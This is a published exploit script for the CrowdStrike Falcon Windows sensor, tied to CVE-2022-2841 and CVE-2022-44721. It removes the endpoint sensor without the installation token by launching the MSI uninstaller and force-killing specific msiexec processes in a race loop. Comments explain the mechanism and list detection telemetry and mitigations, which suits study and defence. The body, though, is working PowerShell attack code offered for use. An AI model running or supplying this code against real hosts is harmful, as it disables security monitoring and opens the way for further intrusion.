# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Publication of CVE-2022-44721 in progress.
#
# What the script does, as visible below: it looks up the sensor's uninstall entry in the
# registry, starts the regular MSI removal for it, and force-stops two of the msiexec
# processes that appear while the removal runs, until no CSFalconService process is left.
# Per the title, the result is removal of the sensor without the installation token.
# NOTE(review): why stopping those particular msiexec instances skips the token check is
# not shown on this page; presumably they are the ones that enforce it. Confirm against the
# advisories for the CVEs named above.
# NOTE(review): stopping msiexec processes owned by other accounts and removing a
# per-machine MSI product presumably requires local administrator rights. Confirm.
#
# Detection (defender view): the observable sequence is a PowerShell parent spawning
# `msiexec /X<sensor product code>`, that same parent terminating msiexec.exe processes
# about 100 ms after they appear, and the CSFalconService process disappearing.
# Process-creation telemetry with command lines (for example Security event 4688 with
# command-line auditing, or Sysmon event 1), MsiInstaller entries in the Application log,
# and an alert on hosts whose sensor stops reporting each cover part of that sequence.
# Mitigation: run a sensor release in which the vendor has fixed the issues named in the
# header (the fixed version is not stated on this page), keep uninstall protection enabled,
# and limit local administrator rights.

# Enumerate the per-machine uninstall entries and pick the one whose DisplayName is the
# sensor's product name.
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) {
        # The seventh backslash-separated component of the key path is the subkey name;
        # it is passed to msiexec /X below as the product code.
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}
# If no entry matched, $uninstall_uuid was never assigned and the lines below still run.

# PIDs of msiexec processes seen so far, in order of first observation.
$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
# Start the standard MSI removal. No -Wait is given, so the script continues immediately
# and the loop below runs alongside the uninstaller.
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

# Poll with no delay between iterations for as long as a CSFalconService process exists.
while($true) {
    if (get-process -Name "CSFalconService") {
        # Every msiexec process on the host is considered, not only the one started above.
        Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
            if (-Not $g_msiexec_instances.contains($_.id)){
                $g_msiexec_instances.Add($_.id)
                # Only the 4th and 5th distinct PIDs recorded are acted on: after a
                # 100 ms pause, the most recently recorded PID is force-stopped.
                if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
                    Start-Sleep -Milliseconds 100
                    Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
                    stop-process -Force -Id $g_msiexec_instances[-1]
                }
            }
        }
    } else {
        # The service process is gone: report and leave the loop.
        Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
        break
    }
}